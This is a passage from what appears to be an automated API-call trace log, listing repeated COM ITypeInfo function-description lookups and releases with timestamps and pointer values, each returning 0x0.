returned 0x0 [0060.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x86, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.234] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x87, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.235] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x88, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.235] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x89, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.235] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8a, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.235] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8b, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.235] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8c, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.235] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8d, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.235] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8e, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.235] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8f, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.235] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x90, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.235] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x91, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.235] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x92, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.235] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x93, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.235] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x94, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.235] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x95, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.235] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x96, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.235] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x97, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.235] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x98, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.235] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x99, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.235] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9a, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.236] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9b, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.236] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9c, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.236] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9d, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.236] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9e, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.236] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9f, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.236] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa0, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.236] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa1, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.236] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa2, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.236] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa3, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.236] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa4, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.236] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa5, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.236] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa6, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.236] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa7, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.236] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa8, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.236] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa9, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.236] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xaa, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.236] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xab, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.236] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xac, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.236] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xad, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.237] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xae, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.237] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xaf, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.237] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb0, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.237] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb1, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.237] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb2, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.237] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb3, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.237] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb4, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.237] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb5, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.237] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb6, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.237] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb7, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.237] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb8, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.237] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb9, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.237] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xba, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.237] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbb, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.237] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbc, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.237] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbd, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.237] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbe, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.237] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbf, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.237] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc0, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.237] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc1, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.237] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc2, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.238] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc3, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.238] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc4, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.238] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc5, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.238] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc6, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.238] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc7, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.238] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc8, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.238] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc9, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.238] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xca, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.238] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xcb, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.238] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xcc, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.238] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xcd, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.238] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xce, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.238] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xcf, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.238] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd0, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.238] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd1, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.238] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd2, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.238] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd3, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.238] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd4, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.238] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd5, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.238] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd6, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.239] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd7, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.239] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd8, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.239] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd9, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.239] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xda, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.239] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xdb, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.239] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xdc, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.239] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xdd, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.239] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xde, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.239] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xdf, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.239] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe0, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.239] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 